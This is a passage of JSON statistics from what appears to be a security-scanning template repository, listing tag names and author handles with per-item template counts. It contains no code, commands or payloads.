"oam","count":1},{"name":"machproweb","count":1},{"name":"foss","count":1},{"name":"minecraft","count":1},{"name":"bookstackapp","count":1},{"name":"mailmap","count":1},{"name":"fms","count":1},{"name":"cvms","count":1},{"name":"microcenter","count":1},{"name":"furiffic","count":1},{"name":"trackmanialadder","count":1},{"name":"amdoren","count":1},{"name":"pollbot","count":1},{"name":"snapdrop","count":1},{"name":"cx","count":1},{"name":"acf_to_rest_api_project","count":1},{"name":"goodjob","count":1},{"name":"uberflip","count":1},{"name":"workreap","count":1},{"name":"bws-subscribers","count":1},{"name":"gyra","count":1},{"name":"h5sconsole","count":1},{"name":"viddler","count":1},{"name":"directus","count":1},{"name":"brighthr","count":1},{"name":"node-red","count":1},{"name":"pluginops","count":1},{"name":"cocca","count":1},{"name":"awdsolution","count":1},{"name":"duckduckgo","count":1},{"name":"-","count":1},{"name":"patton","count":1},{"name":"ultimate-member","count":1},{"name":"devrant","count":1},{"name":"homedesign3d","count":1},{"name":"ozeki","count":1},{"name":"rockettheme","count":1},{"name":"wimkin-publicprofile","count":1},{"name":"mastown-mastodon-instance","count":1},{"name":"vimeo","count":1},{"name":"wp-slimstat","count":1},{"name":"cscart","count":1},{"name":"cuteeditor","count":1},{"name":"ictprotege","count":1},{"name":"opennebula","count":1},{"name":"codebuild","count":1},{"name":"crevado","count":1},{"name":"mastodon-tflnetpl","count":1},{"name":"cube105","count":1},{"name":"affiliatefeeds","count":1},{"name":"objectinjection","count":1},{"name":"oscommerce","count":1},{"name":"grandprof","count":1},{"name":"wishlistr","count":1},{"name":"piano","count":1},{"name":"faspex","count":1},{"name":"cloudanalytics","count":1},{"name":"sqwebmail","count":1},{"name":"vertex","count":1},{"name":"mastodon","count":1},{"name":"facade","count":1},{"name":"eos","count":1},{"name":"discogs","count":1},{"name":"imgsrcru","count":1},{"name":"interpals","count":1},{"name":"eleanor","count":1},{"name":"king-theme","count":1},{"name":"justforfans","count":1},{"name":"oauth2","count":1},{"name":"cloudoa","count":1},{"name":"superwebmailer","count":1},{"name":"tika","count":1},{"name":"catchplugins","count":1},{"name":"fancentro","count":1},{"name":"alquist","count":1},{"name":"zenphoto","count":1},{"name":"amtythumb_project","count":1},{"name":"oceanwp","count":1},{"name":"cherokee","count":1},{"name":"tri","count":1},{"name":"hcommonssocial-mastodon-instance","count":1},{"name":"sni","count":1},{"name":"audiocode","count":1},{"name":"blind-ssrf","count":1},{"name":"ewm","count":1},{"name":"nihbuatjajan","count":1},{"name":"scribble","count":1},{"name":"admin-bypass","count":1},{"name":"officeweb365","count":1},{"name":"x-ui","count":1},{"name":"friendica","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"helmet_store_showroom_site_project","count":1},{"name":"groupib","count":1},{"name":"moneysavingexpert","count":1},{"name":"gnuboard5","count":1},{"name":"wpsolr","count":1},{"name":"aspera","count":1},{"name":"cobub","count":1},{"name":"zomato","count":1},{"name":"ghostcms","count":1},{"name":"mymfans","count":1},{"name":"careerhabr","count":1},{"name":"element","count":1},{"name":"pondol-formmail_project","count":1},{"name":"heroplugins","count":1},{"name":"sahipro","count":1},{"name":"mdb","count":1},{"name":"yapishu","count":1},{"name":"clearcom","count":1},{"name":"tox","count":1},{"name":"member-hero","count":1},{"name":"arris","count":1},{"name":"okru","count":1},{"name":"age-gate","count":1},{"name":"rubedo","count":1},{"name":"fotka","count":1},{"name":"ciphertrust","count":1},{"name":"openvz","count":1},{"name":"speaker-deck","count":1},{"name":"popup-builder","count":1},{"name":"calendar","count":1},{"name":"goahead","count":1},{"name":"angtech","count":1},{"name":"laborator","count":1},{"name":"filetransfer","count":1},{"name":"booked","count":1},{"name":"erp-nc","count":1},{"name":"koha","count":1},{"name":"kingdee","count":1},{"name":"dozzle","count":1},{"name":"imageshack","count":1},{"name":"wpmailster","count":1},{"name":"sp-client-document-manager","count":1},{"name":"arcade","count":1},{"name":"epm","count":1},{"name":"pghero","count":1},{"name":"mailboxvalidator","count":1},{"name":"medium","count":1},{"name":"sureline","count":1},{"name":"ticket-master","count":1},{"name":"furaffinity","count":1},{"name":"wakatime","count":1},{"name":"keenetic","count":1},{"name":"redisinsight","count":1},{"name":"paneil","count":1},{"name":"h2","count":1},{"name":"smule","count":1},{"name":"richfaces","count":1},{"name":"tracking","count":1},{"name":"appweb","count":1},{"name":"sucuri","count":1},{"name":"ms","count":1},{"name":"streamelements","count":1},{"name":"ionice","count":1},{"name":"enterprise","count":1},{"name":"never5","count":1},{"name":"anyproxy","count":1},{"name":"epp","count":1},{"name":"wavemaker","count":1},{"name":"elmah","count":1},{"name":"alik","count":1},{"name":"fortressaircraft","count":1},{"name":"photoblocks","count":1},{"name":"visualstudio","count":1},{"name":"blitapp","count":1},{"name":"cloudfront","count":1},{"name":"directum","count":1},{"name":"scraperbox","count":1},{"name":"auru","count":1},{"name":"soplanning","count":1},{"name":"prototype","count":1},{"name":"bdsmsingles","count":1},{"name":"uwumarket","count":1},{"name":"silverback","count":1},{"name":"videoxpert","count":1},{"name":"hongjing","count":1},{"name":"integrate-google-drive","count":1},{"name":"cytoid","count":1},{"name":"fine-art-america","count":1},{"name":"huijietong","count":1},{"name":"rantli","count":1},{"name":"codementor","count":1},{"name":"kongregate","count":1},{"name":"estate","count":1},{"name":"wp-attachment-export","count":1},{"name":"simple-task","count":1},{"name":"bumsys","count":1},{"name":"phpsec","count":1},{"name":"sarg","count":1},{"name":"blackboard","count":1},{"name":"johnmccollum","count":1},{"name":"katz","count":1},{"name":"documentor-lite","count":1},{"name":"pantsel","count":1},{"name":"secure-copy-content-protection","count":1},{"name":"readtomyshoe_project","count":1},{"name":"easyreport","count":1},{"name":"eyoumail","count":1},{"name":"anycomment","count":1},{"name":"mflow","count":1},{"name":"synnefo","count":1},{"name":"shanii-writes","count":1},{"name":"shopizer","count":1},{"name":"voyager","count":1},{"name":"portrait-archiv-shop","count":1},{"name":"niagara","count":1},{"name":"signal","count":1},{"name":"currencyfreaks","count":1},{"name":"chamsko","count":1},{"name":"slides","count":1},{"name":"robot-cpa","count":1},{"name":"estream","count":1},{"name":"eng","count":1},{"name":"dvdfab","count":1},{"name":"phonepe","count":1},{"name":"jotform","count":1},{"name":"joomlamart","count":1},{"name":"osclass","count":1},{"name":"postcrossing","count":1},{"name":"racksnet","count":1},{"name":"eyoucms","count":1},{"name":"smi","count":1},{"name":"tagdiv","count":1},{"name":"archibus","count":1},{"name":"jh_404_logger_project","count":1},{"name":"apollotheme","count":1},{"name":"kodexplorer","count":1},{"name":"glodon","count":1},{"name":"designsandcode","count":1},{"name":"novus","count":1},{"name":"protocol","count":1},{"name":"opensmtpd","count":1},{"name":"lobsters","count":1},{"name":"datataker","count":1},{"name":"incomcms_project","count":1},{"name":"easysocialfeed","count":1},{"name":"chachethq","count":1},{"name":"mappresspro","count":1},{"name":"cracked-io","count":1},{"name":"mysqld","count":1},{"name":"ogc","count":1},{"name":"canto","count":1},{"name":"prvpl","count":1},{"name":"soloby","count":1},{"name":"ipanel","count":1},{"name":"sash","count":1},{"name":"dfgames","count":1},{"name":"shoowbiz","count":1},{"name":"tftp","count":1},{"name":"readthedocs","count":1},{"name":"wpb-show-core","count":1},{"name":"fortra","count":1},{"name":"aa-exec","count":1},{"name":"tieline","count":1},{"name":"pdi","count":1},{"name":"pritunl","count":1},{"name":"duolingo","count":1},{"name":"cofense","count":1},{"name":"cognito","count":1},{"name":"siebel","count":1},{"name":"nodogsplash","count":1},{"name":"tigase","count":1},{"name":"audiojungle","count":1},{"name":"graphpaperpress","count":1},{"name":"ctolog","count":1},{"name":"optimizingmatters","count":1},{"name":"jsonbin","count":1},{"name":"agegate","count":1},{"name":"feedwordpress_project","count":1},{"name":"lg-nas","count":1},{"name":"darkcomet","count":1},{"name":"shadowpad","count":1},{"name":"icedid","count":1},{"name":"slurm","count":1},{"name":"sensiolabs","count":1},{"name":"iiop","count":1},{"name":"themefusion","count":1},{"name":"hookbot","count":1},{"name":"musiciansocial-mastodon-instance","count":1},{"name":"schools_alert_management_script_project","count":1},{"name":"bibliopac","count":1},{"name":"anaqua","count":1},{"name":"pprof","count":1},{"name":"jupyterlab","count":1},{"name":"redcap","count":1},{"name":"appjetty","count":1},{"name":"urosevic","count":1},{"name":"riseup","count":1},{"name":"alchemy","count":1},{"name":"balada","count":1},{"name":"rujjie","count":1},{"name":"runatlantis","count":1},{"name":"beego","count":1},{"name":"blueiris","count":1},{"name":"smf","count":1},{"name":"transmission","count":1},{"name":"eg","count":1},{"name":"my_calendar_project","count":1},{"name":"phpsocialnetwork","count":1},{"name":"iparapheur","count":1},{"name":"fontawesome","count":1},{"name":"scanii","count":1},{"name":"keepersecurity","count":1},{"name":"mastodon-social-tchncs","count":1},{"name":"openerp","count":1},{"name":"supremainc","count":1},{"name":"dericam","count":1},{"name":"oliver","count":1},{"name":"spirit-project","count":1},{"name":"iserver","count":1},{"name":"jasperreport","count":1},{"name":"properties","count":1},{"name":"panasonic","count":1},{"name":"eporner","count":1},{"name":"geolocation","count":1},{"name":"eyelock","count":1},{"name":"openbb","count":1},{"name":"paysyspro","count":1},{"name":"celery","count":1},{"name":"mapproxy","count":1},{"name":"alumni","count":1},{"name":"toko","count":1},{"name":"hiring","count":1},{"name":"trilithic","count":1},{"name":"extensive-vc-addon","count":1},{"name":"admanager","count":1},{"name":"wsftp","count":1},{"name":"flipboard","count":1},{"name":"activecollab","count":1},{"name":"musictraveler","count":1},{"name":"darudar","count":1},{"name":"edgeos","count":1},{"name":"titanhq","count":1},{"name":"google-earth","count":1},{"name":"centreon","count":1},{"name":"osghs","count":1},{"name":"skillshare","count":1},{"name":"youpic","count":1},{"name":"harvardart","count":1},{"name":"anyscale","count":1},{"name":"alltube","count":1},{"name":"satellian","count":1},{"name":"account-takeover","count":1},{"name":"flexnet","count":1},{"name":"bouqueteditor_project","count":1},{"name":"code-garage","count":1},{"name":"kybernetika","count":1},{"name":"filr","count":1},{"name":"simple_task_managing_system_project","count":1},{"name":"wp-upg","count":1},{"name":"keystone","count":1},{"name":"k8","count":1},{"name":"icloud","count":1},{"name":"public","count":1},{"name":"qibocms","count":1},{"name":"getflightpath","count":1},{"name":"lumis","count":1},{"name":"gpon","count":1},{"name":"bws-xss","count":1},{"name":"checkmarx","count":1},{"name":"redv","count":1},{"name":"airliners","count":1},{"name":"etoro","count":1},{"name":"inpost-gallery","count":1},{"name":"bangresto","count":1},{"name":"chromecast","count":1},{"name":"saracartershow","count":1},{"name":"snapchat-stories","count":1},{"name":"nexusphp","count":1},{"name":"trip","count":1},{"name":"archive-of-our-own-account","count":1},{"name":"piratebay","count":1},{"name":"web3storage","count":1},{"name":"pacs","count":1},{"name":"trilium","count":1},{"name":"analytify","count":1},{"name":"phpunit_project","count":1},{"name":"bscw","count":1},{"name":"profilegrid","count":1},{"name":"wp-helper-lite","count":1},{"name":"untappd","count":1},{"name":"newgrounds","count":1},{"name":"szmerinfo","count":1},{"name":"awx","count":1},{"name":"packetstrom","count":1},{"name":"getperfectsurvey","count":1},{"name":"imprivata","count":1},{"name":"heylink","count":1},{"name":"mingyu","count":1},{"name":"upnp","count":1},{"name":"newmeet","count":1},{"name":"interactsh","count":1},{"name":"reality","count":1},{"name":"file-download","count":1},{"name":"traggo","count":1},{"name":"cowrie","count":1},{"name":"codecabin","count":1},{"name":"c4","count":1},{"name":"stackhawk","count":1},{"name":"palnet","count":1},{"name":"themeforest","count":1},{"name":"xdebug","count":1},{"name":"attenzione","count":1},{"name":"fatwire","count":1},{"name":"sumo","count":1},{"name":"xbox-gamertag","count":1},{"name":"domphp","count":1},{"name":"skaut-bazar_project","count":1},{"name":"yui2","count":1},{"name":"target","count":1},{"name":"casemanager","count":1},{"name":"salia-plcc","count":1},{"name":"arl","count":1},{"name":"varnish","count":1},{"name":"openview","count":1},{"name":"chromium","count":1},{"name":"ameblo","count":1},{"name":"dwsync","count":1},{"name":"ulanzi","count":1},{"name":"saltapi","count":1},{"name":"rsync","count":1},{"name":"appsmith","count":1},{"name":"tar","count":1},{"name":"extplorer","count":1},{"name":"powerware","count":1},{"name":"room-alert","count":1},{"name":"getresponse","count":1},{"name":"fortitoken","count":1},{"name":"malwarebazaar","count":1},{"name":"connectsecure","count":1},{"name":"codeberg","count":1},{"name":"titan-framework","count":1},{"name":"cms_tree_page_view_project","count":1},{"name":"tanukipl","count":1},{"name":"nosql","count":1},{"name":"clink-office","count":1},{"name":"gunicorn","count":1},{"name":"secui","count":1},{"name":"rpmdb","count":1},{"name":"karma","count":1},{"name":"macaddresslookup","count":1},{"name":"ampguard","count":1},{"name":"springblade","count":1},{"name":"art","count":1},{"name":"wikidot","count":1},{"name":"ltrace","count":1},{"name":"v2924","count":1},{"name":"wanelo","count":1},{"name":"opentouch","count":1},{"name":"inaturalist","count":1},{"name":"liftoffsoftware","count":1},{"name":"impala","count":1},{"name":"show-all-comments-in-one-page","count":1},{"name":"kibokolabs","count":1},{"name":"nopcommerce","count":1},{"name":"anydesk","count":1},{"name":"asciinema","count":1},{"name":"g-auto-hyperlink","count":1},{"name":"secudos","count":1},{"name":"campaignmonitor","count":1},{"name":"orbys","count":1},{"name":"behance","count":1},{"name":"discusselasticco","count":1},{"name":"mybuildercom","count":1},{"name":"iwork","count":1},{"name":"wpcargo","count":1},{"name":"openx","count":1},{"name":"locklizard","count":1},{"name":"namedprocess","count":1},{"name":"extreme","count":1},{"name":"craft_cms","count":1},{"name":"quip","count":1},{"name":"ip-series","count":1},{"name":"goodlayerslms","count":1},{"name":"drone","count":1},{"name":"polchatpl","count":1},{"name":"bws-adminpage","count":1},{"name":"login-bypass","count":1},{"name":"sky","count":1},{"name":"jc6","count":1},{"name":"applezeed","count":1},{"name":"imm","count":1},{"name":"rethinkdb","count":1},{"name":"teradici","count":1},{"name":"sfd","count":1},{"name":"mail-masta_project","count":1},{"name":"jspxcms","count":1},{"name":"hmc","count":1},{"name":"speakout\\!_email_petitions_project","count":1},{"name":"lemlist","count":1},{"name":"osnexus","count":1},{"name":"hcl","count":1},{"name":"mws","count":1},{"name":"cdapl","count":1},{"name":"ifttt","count":1},{"name":"cors","count":1},{"name":"rss","count":1},{"name":"wielebenwir","count":1},{"name":"joomlashowroom","count":1},{"name":"calendarix","count":1},{"name":"arduino","count":1},{"name":"hostuxsocial-mastodon-instance","count":1},{"name":"issuu","count":1},{"name":"pulsar360","count":1},{"name":"jaspersoft","count":1},{"name":"photoxhibit_project","count":1},{"name":"antsword","count":1},{"name":"codeforces","count":1},{"name":"ecom","count":1},{"name":"slocum","count":1},{"name":"scratch","count":1},{"name":"tuxedo","count":1},{"name":"masa","count":1},{"name":"colourlovers","count":1},{"name":"catalogcreater","count":1},{"name":"simplecrm","count":1},{"name":"qsan","count":1},{"name":"yeswehack","count":1},{"name":"mobiproxy","count":1},{"name":"sar2html","count":1},{"name":"contus-video-gallery","count":1},{"name":"bruteforce","count":1},{"name":"gianni_tommasi","count":1},{"name":"nawk","count":1},{"name":"helmet_store_showroom_project","count":1},{"name":"imagements_project","count":1},{"name":"vultr","count":1},{"name":"tamtam","count":1},{"name":"realtek","count":1},{"name":"naija-planet","count":1},{"name":"patronite","count":1},{"name":"tumblr","count":1},{"name":"wptimecapsule","count":1},{"name":"advfn","count":1},{"name":"eurotel","count":1},{"name":"daybyday","count":1},{"name":"garage_management_system_project","count":1},{"name":"rcdevs","count":1},{"name":"kotburger","count":1},{"name":"adult-forum","count":1},{"name":"ciprianmp","count":1},{"name":"open-redirect","count":1},{"name":"bikemap","count":1},{"name":"dotnetcms","count":1},{"name":"websvn","count":1},{"name":"prestahome","count":1},{"name":"kubeconfig","count":1},{"name":"officeserver","count":1},{"name":"cdist","count":1},{"name":"teltonika","count":1},{"name":"upc","count":1},{"name":"Chase","count":1},{"name":"vision","count":1},{"name":"bonita","count":1},{"name":"clipbucket","count":1}],"authors":[{"name":"dhiyaneshdk","count":1251},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":803},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":345},{"name":"ritikchaddha","count":320},{"name":"pdteam","count":296},{"name":"ricardomaia","count":232},{"name":"geeknik","count":229},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":171},{"name":"gy741","count":158},{"name":"rxerium","count":138},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":119},{"name":"righettod","count":114},{"name":"tess","count":109},{"name":"pdresearch","count":75},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"iamnoooob","count":63},{"name":"akincibor","count":59},{"name":"rootxharsh","count":56},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":48},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"johnk3r","count":39},{"name":"j4vaovo","count":35},{"name":"c-sh0","count":35},{"name":"luisfelipe146","count":31},{"name":"adam crosser","count":31},{"name":"pwnhxl","count":28},{"name":"ice3man","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"harsh","count":23},{"name":"ctflearner","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"mastercho","count":22},{"name":"parthmalhotra","count":18},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"random-robbie","count":16},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"lu4nx","count":16},{"name":"sheikhrishad","count":15},{"name":"unapibageek","count":15},{"name":"pr3r00t","count":15},{"name":"bhutch","count":14},{"name":"r3dg33k","count":14},{"name":"dogasantos","count":14},{"name":"milo2012","count":14},{"name":"tenbird","count":14},{"name":"theabhinavgaur","count":13},{"name":"elsfa7110","count":13},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"melbadry9","count":13},{"name":"kazet","count":12},{"name":"suman_kar","count":12},{"name":"meme-lord","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"co5mos","count":10},{"name":"0x240x23elu","count":10},{"name":"random_robbie","count":10},{"name":"olearycrew","count":9},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"oppsec","count":9},{"name":"fabaff","count":9},{"name":"emadshanab","count":9},{"name":"initstring","count":9},{"name":"that_juan_","count":8},{"name":"noraj","count":8},{"name":"iamthefrogy","count":8},{"name":"veshraj","count":8},{"name":"zh","count":8},{"name":"irshad ahamed","count":8},{"name":"_0xf4n9x_","count":8},{"name":"aashiq","count":8},{"name":"amit-jd","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"leovalcante","count":7},{"name":"kophjager007","count":7},{"name":"its0x08","count":7},{"name":"caspergn","count":7},{"name":"huta0","count":7},{"name":"nodauf","count":7},{"name":"harshbothra_","count":7},{"name":"tarunkoyalwar","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"evan rubinstein","count":6},{"name":"pathtaga","count":6},{"name":"hahwul","count":6},{"name":"justaacat","count":6},{"name":"clem9669","count":6},{"name":"devang-solanki","count":6},{"name":"imnightmaree","count":6},{"name":"xelkomy","count":6},{"name":"megamansec","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"gitlab red team","count":6},{"name":"ja1sh","count":6},{"name":"byt3bl33d3r","count":6},{"name":"forgedhallpass","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"__fazal","count":6},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"kh4sh3i","count":5},{"name":"s0obi","count":5},{"name":"yanyun","count":5},{"name":"defr0ggy","count":5},{"name":"r12w4n","count":5},{"name":"gtrrnr","count":5},{"name":"andreluna","count":5},{"name":"lucky0x0d","count":5},{"name":"mr-xn","count":5},{"name":"prajiteshsingh","count":5},{"name":"your3cho","count":5},{"name":"robotshell","count":5},{"name":"r3naissance","count":5},{"name":"shine","count":5},{"name":"powerexploit","count":5},{"name":"arm!tage","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"vicrack","count":5},{"name":"heeress","count":4},{"name":"tanq16","count":4},{"name":"xxcdd","count":4},{"name":"h1ei1","count":4},{"name":"k0pak4","count":4},{"name":"dadevel","count":4},{"name":"scent2d","count":4},{"name":"nybble04","count":4},{"name":"cookiehanhoan","count":4},{"name":"king-alexander","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"m4lwhere","count":4},{"name":"incogbyte","count":4},{"name":"shankar acharya","count":4},{"name":"iamnooob","count":4},{"name":"pulsesecurity.co.nz","count":4},{"name":"ggranjus","count":4},{"name":"0xr2r","count":4},{"name":"3th1c_yuk1","count":4},{"name":"lum8rjack","count":4},{"name":"dolev farhi","count":4},{"name":"ice3man543","count":4},{"name":"jpg0mez","count":4},{"name":"true13","count":3},{"name":"dudez","count":3},{"name":"sushantkamble","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"f1tz","count":3},{"name":"bernardofsr","count":3},{"name":"e1a","count":3},{"name":"andydoering","count":3},{"name":"isacaya","count":3},{"name":"badboycxcc","count":3},{"name":"skeltavik","count":3},{"name":"coldfish","count":3},{"name":"impramodsargar","count":3},{"name":"ambassify","count":3},{"name":"shifacyclewala","count":3},{"name":"dr0pd34d","count":3},{"name":"canberbamber","count":3},{"name":"lark-lab","count":3},{"name":"atomiczsec","count":3},{"name":"huowuzhao","count":3},{"name":"imjust0","count":3},{"name":"farish","count":3},{"name":"splint3r7","count":3},{"name":"vsh00t","count":3},{"name":"ph33r","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"ekrause","count":3},{"name":"aringo","count":3},{"name":"vagnerd","count":3},{"name":"0w4ys","count":3},{"name":"swissky","count":3},{"name":"j3ssie","count":3},{"name":"parth","count":3},{"name":"davidmckennirey","count":3},{"name":"johnjhacking","count":3},{"name":"jarijaas","count":3},{"name":"lucasljm2001","count":3},{"name":"whoever","count":3},{"name":"fxploit","count":3},{"name":"xianke","count":3},{"name":"binaryfigments","count":3},{"name":"unstabl3","count":3},{"name":"thomas_from_offensity","count":3},{"name":"evergreencartoons","count":3},{"name":"arcc","count":3},{"name":"emenalf","count":3},{"name":"matt galligan","count":3},{"name":"_generic_human_","count":3},{"name":"alifathi-h1","count":3},{"name":"cheesymoon","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"randomrobbie","count":3},{"name":"me9187","count":3},{"name":"flx","count":3},{"name":"mavericknerd","count":3},{"name":"taielab","count":3},{"name":"mzack9999","count":2},{"name":"ehsahil","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsapra","count":2},{"name":"shankaracharya","count":2},{"name":"randomdhiraj","count":2},{"name":"bsysop","count":2},{"name":"brenocss","count":2},{"name":"ree4pwn","count":2},{"name":"bing0o","count":2},{"name":"paradessia","count":2},{"name":"korteke","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"danielmofer","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"0xnirvana","count":2},{"name":"kishore-hariram","count":2},{"name":"mohammedsaneem","count":2},{"name":"c3l3si4n","count":2},{"name":"cckuakilong","count":2},{"name":"8arthur","count":2},{"name":"salts","count":2},{"name":"vavkamil","count":2},{"name":"sascha brendel","count":2},{"name":"brucelsone","count":2},{"name":"liwermor","count":2},{"name":"n-thumann","count":2},{"name":"cocxanh","count":2},{"name":"manas_harsh","count":2},{"name":"h0j3n","count":2},{"name":"666asd","count":2},{"name":"thevillagehacker","count":2},{"name":"nvn1729","count":2},{"name":"joshlarsen","count":2},{"name":"gal nagli","count":2},{"name":"moritz nentwig","count":2},{"name":"florianmaak","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"zomsop82","count":2},{"name":"clarkvoss","count":2},{"name":"k11h-de","count":2},{"name":"shelled","count":2},{"name":"raesene","count":2},{"name":"bananabr","count":2},{"name":"afaq","count":2},{"name":"hetroublemakr","count":2},{"name":"luci","count":2},{"name":"x1m_martijn","count":2},{"name":"christianpoeschl","count":2},{"name":"msegoviag","count":2},{"name":"convisoappsec","count":2},{"name":"g4l1t0","count":2},{"name":"gevakun","count":2},{"name":"usdag","count":2},{"name":"uomogrande","count":2},{"name":"foulenzer","count":2},{"name":"koti2","count":2},{"name":"geekby","count":2},{"name":"y4er","count":2},{"name":"sy3omda","count":2},{"name":"arliya","count":2},{"name":"z0ne","count":2},{"name":"0xcrypto","count":2},{"name":"martincodes-de","count":2},{"name":"sbani","count":2},{"name":"dbrwsky","count":2},{"name":"nkxxkn","count":2},{"name":"maximus decimus","count":2},{"name":"w4cky_","count":2},{"name":"thardt-praetorian","count":2},{"name":"nuk3s3c","count":2},{"name":"d4vy","count":2},{"name":"mrharshvardhan","count":2},{"name":"kazgangap","count":2},{"name":"zy9ard3","count":2},{"name":"myztique","count":2},{"name":"kiblyn11","count":2},{"name":"bmcel","count":2},{"name":"danmcinerney","count":2},{"name":"herry","count":2},{"name":"ajaysenr","count":2},{"name":"bp0lr","count":2},{"name":"sinkettu","count":2},{"name":"supr4s","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"parzival","count":2},{"name":"c4sper0","count":2},{"name":"lotusdll","count":2},{"name":"thezakman","count":2},{"name":"ep1csage","count":2},{"name":"dogancanbakir","count":2},{"name":"0xrudra","count":2},{"name":"streetofhackerr007","count":2},{"name":"hackerarpan","count":2},{"name":"socketz","count":2},{"name":"codexlynx","count":2},{"name":"rafaelwdornelas","count":2},{"name":"6mile","count":2},{"name":"joshua rogers","count":2},{"name":"redteambrasil","count":2},{"name":"joeldeleep","count":2},{"name":"pxmme1337","count":2},{"name":"0xsmiley","count":2},{"name":"notnotnotveg","count":2},{"name":"0xelkomy","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amsda","count":2},{"name":"v0idc0de","count":2},{"name":"github.com/its0x08","count":2},{"name":"paperpen","count":2},{"name":"charles d.","count":2},{"name":"thabisocn","count":2},{"name":"dahse89","count":2},{"name":"kre80r","count":2},{"name":"supras","count":2},{"name":"ayadim","count":2},{"name":"wa1tf0rme","count":2},{"name":"davidegirardi","count":2},{"name":"akash.c","count":1},{"name":"prettyboyaaditya","count":1},{"name":"gboddin","count":1},{"name":"sicksec","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"elder tao","count":1},{"name":"izn0u","count":1},{"name":"jonathanwalker","count":1},{"name":"banana69","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"rumble773","count":1},{"name":"0xtavian","count":1},{"name":"babybash","count":1},{"name":"kchason","count":1},{"name":"lethargynavigator","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"andirrahmani1","count":1},{"name":"0xprial","count":1},{"name":"igibanez","count":1},{"name":"qlkwej","count":1},{"name":"yuansec","count":1},{"name":"_c0wb0y_","count":1},{"name":"qianbenhyu","count":1},{"name":"pudsec","count":1},{"name":"imhunterand","count":1},{"name":"alexrydzak","count":1},{"name":"pussycat0","count":1},{"name":"5up3r541y4n","count":1},{"name":"phillipo","count":1},{"name":"bywalks","count":1},{"name":"sttlr","count":1},{"name":"none","count":1},{"name":"daffianfo","count":1},{"name":"sdcampbell","count":1},{"name":"retr0","count":1},{"name":"gonski","count":1},{"name":"high","count":1},{"name":"aayush vishnoi","count":1},{"name":"evan rubinstien","count":1},{"name":"sec_hawk","count":1},{"name":"bjhulst","count":1},{"name":"harshinsecurity","count":1},{"name":"_harleo","count":1},{"name":"bad5ect0r","count":1},{"name":"esonhugh","count":1},{"name":"fur1na","count":1},{"name":"chron0x","count":1},{"name":"kagamigawa","count":1},{"name":"0xd0ff9","count":1},{"name":"hateshape","count":1},{"name":"kr1shna4garwal","count":1},{"name":"shivanshkhari","count":1},{"name":"ayadi","count":1},{"name":"fq_hsu","count":1},{"name":"vinit989","count":1},{"name":"marcos_iaf","count":1},{"name":"revblock","count":1},{"name":"liquidsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"francescocarlucci","count":1},{"name":"lbb","count":1},{"name":"0xh7ml","count":1},{"name":"mayank_pandey01","count":1},{"name":"fmunozs","count":1},{"name":"luqman","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"knassar702","count":1},{"name":"hotpot","count":1},{"name":"ph33rr","count":1},{"name":"jbertman","count":1},{"name":"vzamanillo","count":1},{"name":"kurohost","count":1},{"name":"jaskaran","count":1},{"name":"ahmetpergamum","count":1},{"name":"soyelmago","count":1},{"name":"b0rn2r00t","count":1},{"name":"cravaterouge","count":1},{"name":"udinchan","count":1},{"name":"patrick pirker","count":1},{"name":"pjborah","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"adnanekhan","count":1},{"name":"p-l-","count":1},{"name":"adamparsons","count":1},{"name":"kaizensecurity","count":1},{"name":"domenicoveneziano","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"lrtk-coder","count":1},{"name":"aron molnar","count":1},{"name":"push4d","count":1},{"name":"hardik-rathod","count":1},{"name":"r3s 